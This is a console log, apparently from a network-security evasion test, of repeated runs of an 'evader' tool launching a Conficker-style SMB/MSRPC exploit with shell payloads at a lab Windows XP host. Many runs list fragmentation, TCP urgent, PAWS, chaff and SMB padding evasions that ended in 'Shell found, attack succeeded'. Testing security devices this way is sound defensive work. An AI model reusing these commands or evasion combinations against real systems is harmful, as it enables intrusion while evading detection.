- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19557 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=MlzU34gI/UA --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"72" --evasion=[start,netbios_connect]ipv4_order,"firstlast" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed MlzU34gI/UA
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 72 bytes per fragment
- Info: NetBIOS connection 10.62.90.115:19557 -> 10.35.1.207:445
- Terminated
- ....
- 9481 runs averaging 1.90 runs / second ; progress: 4993/43200
- 9481 runs averaging 1.90 runs / second ; progress: 4998/43200
- 9481 runs averaging 1.90 runs / second ; progress: 5003/43200.........
- 9490 runs averaging 1.90 runs / second ; progress: 5008/43200......
- 9496 runs averaging 1.89 runs / second ; progress: 5013/43200Pid 13487 timed out - killed
- 2015-06-08 00:43:03 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39306 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Q0zugvYbYYA --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed Q0zugvYbYYB
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:39306 -> 10.35.1.207:445
- Terminated
- .....
- 9502 runs averaging 1.89 runs / second ; progress: 5018/43200....
- 9506 runs averaging 1.89 runs / second ; progress: 5023/43200...........2015-06-08 00:43:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17032 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=rkDra41C6CA --evasion=[smb_connect,smb_opentree]ipv4_frag,"64" --evasion=[msrpc_bind,msrpc_req]ipv4_opt,"25%","inc","alphanumrandomized" --evasion=[smb_opentree,end]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed rkDra41C6CC
- The following evasions are applied from stage smb_connect to smb_opentree:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- Info: NetBIOS connection 10.62.90.113:17032 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 9520 runs averaging 1.89 runs / second ; progress: 5028/43200.......
- 9527 runs averaging 1.89 runs / second ; progress: 5033/43200......
- 9533 runs averaging 1.89 runs / second ; progress: 5038/43200.Pid 13797 timed out - killed
- 2015-06-08 00:43:28 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45463 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=BmVQm+XD3os --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,end]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed BmVQm+XD3os
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.114:45463 -> 10.35.1.207:445
- Terminated
- .........
- 9544 runs averaging 1.89 runs / second ; progress: 5043/43200..........
- 9554 runs averaging 1.89 runs / second ; progress: 5048/43200......
- 9560 runs averaging 1.89 runs / second ; progress: 5053/43200
- 9560 runs averaging 1.89 runs / second ; progress: 5058/43200...
- 9563 runs averaging 1.89 runs / second ; progress: 5063/43200.......
- 9570 runs averaging 1.89 runs / second ; progress: 5068/43200........
- 9578 runs averaging 1.89 runs / second ; progress: 5073/43200...
- 9581 runs averaging 1.89 runs / second ; progress: 5078/43200....
- 9585 runs averaging 1.89 runs / second ; progress: 5083/43200..........
- 9595 runs averaging 1.89 runs / second ; progress: 5088/43200...2015-06-08 00:44:19 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51195 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=WX0LabE5SUM --evasion=[smb_connect,msrpc_bind]netbios_chaff,"21","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"6","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed WX0LabE5SUN
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.113:51195 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 9607 runs averaging 1.89 runs / second ; progress: 5093/43200.Pid 14503 timed out - killed
- 2015-06-08 00:44:24 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=crQp6CU8s8g --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"64" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed crQp6CU8s8h
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 64 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.110:24836 -> 10.35.1.207:445
- Terminated
- .....
- 9614 runs averaging 1.89 runs / second ; progress: 5098/43200......
- 9620 runs averaging 1.89 runs / second ; progress: 5103/43200.........
- 9629 runs averaging 1.89 runs / second ; progress: 5108/43200..........
- 9639 runs averaging 1.89 runs / second ; progress: 5113/43200.........
- 9648 runs averaging 1.89 runs / second ; progress: 5118/43200.......
- 9655 runs averaging 1.88 runs / second ; progress: 5123/43200.....
- 9660 runs averaging 1.88 runs / second ; progress: 5128/43200.........
- 9669 runs averaging 1.88 runs / second ; progress: 5133/43200.....
- 9674 runs averaging 1.88 runs / second ; progress: 5138/43200.....
- 9679 runs averaging 1.88 runs / second ; progress: 5143/43200...........
- 9690 runs averaging 1.88 runs / second ; progress: 5148/43200...........
- 9701 runs averaging 1.88 runs / second ; progress: 5153/43200...2015-06-08 00:45:25 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35341 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=ggSUJv4b+PQ --evasion=[smb_openpipe,end]smb_writeandxpad,"6","random" --evasion=[start,end]tcp_paws,"50%","187349922","random" --verifydelay=1000 --payload=shell
- Info: Using random seed ggSUJv4b+PS
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 187349922> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- Info: NetBIOS connection 10.62.90.114:35341 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:45:25 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58158 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xTjXRzVMytY --evasion=[smb_opentree,end]tcp_paws,"5","9","shuffle" --evasion=[smb_openpipe,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed xTjXRzVMytb
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.110:58158 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 9710 runs averaging 1.88 runs / second ; progress: 5158/43200......
- 9716 runs averaging 1.88 runs / second ; progress: 5163/43200.....
- 9721 runs averaging 1.88 runs / second ; progress: 5168/43200..
- 9723 runs averaging 1.88 runs / second ; progress: 5173/43200Pid 15235 timed out - killed
- 2015-06-08 00:45:43 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62990 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F8rOXONBWIg --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"3","5","90","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed F8rOXONBWIg
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 90 random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:62990 -> 10.35.1.207:445
- Terminated
- ............
- 9736 runs averaging 1.88 runs / second ; progress: 5178/43200......
- 9742 runs averaging 1.88 runs / second ; progress: 5183/43200
- 9742 runs averaging 1.88 runs / second ; progress: 5188/43200
- 9742 runs averaging 1.88 runs / second ; progress: 5193/43200....
- 9746 runs averaging 1.87 runs / second ; progress: 5198/43200..
- 9748 runs averaging 1.87 runs / second ; progress: 5203/43200
- 9748 runs averaging 1.87 runs / second ; progress: 5208/43200..
- 9750 runs averaging 1.87 runs / second ; progress: 5213/43200.....
- 9755 runs averaging 1.87 runs / second ; progress: 5218/43200.....
- 9760 runs averaging 1.87 runs / second ; progress: 5223/43200......
- 9766 runs averaging 1.87 runs / second ; progress: 5228/43200Pid 16139 timed out - killed
- 2015-06-08 00:46:38 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18534 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=UWQTgxLgPHQ --evasion=[start,end]tcp_chaff,"13","nullchksum|outofwindow","alphanumrandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed UWQTgxLgPHR
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:18534 -> 10.35.1.207:445
- Terminated
- .2015-06-08 00:46:39 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61513 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=5kiMdDy3TFI --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"2","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","5","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 5kiMdDy3TFL
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:61513 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 9784 runs averaging 1.87 runs / second ; progress: 5233/43200..............
- 9798 runs averaging 1.87 runs / second ; progress: 5238/43200...........2015-06-08 00:46:52 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11372 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lnUUcWzYjN4 --evasion=[start,msrpc_req]tcp_chaff,"25%","nullchksum|nullflag","random_alpha" --evasion=[start,msrpc_req]tcp_paws,"75%","144672393","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed lnUUcWzYjN6
- The following evasions are applied from stage start to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * Duplicate packet has random alpha bytes as payload
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 144672393> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.111:11372 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 9811 runs averaging 1.87 runs / second ; progress: 5243/43200............
- 9823 runs averaging 1.87 runs / second ; progress: 5248/43200.......
- 9830 runs averaging 1.87 runs / second ; progress: 5253/43200.....
- 9835 runs averaging 1.87 runs / second ; progress: 5258/43200..Pid 16829 timed out - killed
- 2015-06-08 00:47:11 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31195 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=g3i822C4j6o --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","7","1","random_msrpcbind" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"50%","longhdr","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed g3i822C4j6q
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:31195 -> 10.35.1.207:445
- Terminated
- ......
- 9844 runs averaging 1.87 runs / second ; progress: 5263/43200.
- 9845 runs averaging 1.87 runs / second ; progress: 5268/43200
- 9845 runs averaging 1.87 runs / second ; progress: 5273/43200....
- 9849 runs averaging 1.87 runs / second ; progress: 5278/43200..........
- 9859 runs averaging 1.87 runs / second ; progress: 5283/43200.2015-06-08 00:47:34 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49009 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=pAFHX3UuQoc --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_ebcdic","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,end]tcp_paws,"1","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed pAFHX3UuQoe
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * Cray floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.118:49009 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..Pid 17242 timed out - killed
- 2015-06-08 00:47:36 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37714 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=zMj0U5a/Pp0 --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"50%","random_alphanum" --evasion=[smb_opentree,end]tcp_urgent,"13","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed zMj0U5a/Pp3
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.112:37714 -> 10.35.1.207:445
- Terminated
- .....
- 9869 runs averaging 1.87 runs / second ; progress: 5288/43200........
- 9877 runs averaging 1.87 runs / second ; progress: 5293/43200.
- 9878 runs averaging 1.86 runs / second ; progress: 5298/43200
- 9878 runs averaging 1.86 runs / second ; progress: 5303/43200Pid 17425 timed out - killed
- 2015-06-08 00:47:55 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46226 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=phYQAl9P9Ek --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"5","empty_unspec|empty_keepalive|http_post|msrpc_req" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed phYQAl9P9Em
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.115:46226 -> 10.35.1.207:445
- Terminated
- ...........
- 9890 runs averaging 1.86 runs / second ; progress: 5308/43200...........
- 9901 runs averaging 1.86 runs / second ; progress: 5314/43200..2015-06-08 00:48:05 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51959 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=+VYvQ2mQ8bE --evasion=[smb_connect,end]smb_chaff,"5","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"1022","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed +VYvQ2mQ8bH
- The following evasions are applied from stage smb_connect to end:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:51959 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 9907 runs averaging 1.86 runs / second ; progress: 5319/43200.......
- 9914 runs averaging 1.86 runs / second ; progress: 5324/43200..............
- 9928 runs averaging 1.86 runs / second ; progress: 5329/43200.............
- 9941 runs averaging 1.86 runs / second ; progress: 5334/43200....
- 9945 runs averaging 1.86 runs / second ; progress: 5339/43200.Pid 17947 timed out - killed
- 2015-06-08 00:48:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19121 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=DkgYBia6gZ4 --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","2","10","random" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"5","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed DkgYBia6gZ4
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphanumeric urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 10 random bytes.
- Info: NetBIOS connection 10.62.90.116:19121 -> 10.35.1.207:445
- Terminated
- ........
- 9955 runs averaging 1.86 runs / second ; progress: 5344/43200.....2015-06-08 00:48:36 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37931 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=gb7yxSxJuLs --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","240184953","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed gb7yxSxJuLu
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 240184953> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.112:37931 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 9967 runs averaging 1.86 runs / second ; progress: 5349/43200.....2015-06-08 00:48:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57198 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=gDU7yuN81Mg --evasion=[netbios_connect,smb_opentree]ipv4_opt,"2","inc","alphanumrandomized" --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_null_trailer" --evasion=[start,msrpc_req]tcp_paws,"1","268435453","random" --verifydelay=1000 --payload=shell
- Info: Using random seed gDU7yuN81Mi
- The following evasions are applied from stage start to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.115:57198 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..2015-06-08 00:48:41 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57307 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=qWTEmsEyMHI --evasion=[smb_opentree,msrpc_bind]smb_chaff,"25%","write_flag","zero" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","7","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed qWTEmsEyMHK
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.111:57307 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 9985 runs averaging 1.87 runs / second ; progress: 5354/43200..........2015-06-08 00:48:46 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hCXgqyW1xgM --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"6","random_alphanum" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"75%","6247869","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed hCXgqyW1xgO
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6247869> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.116:30391 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
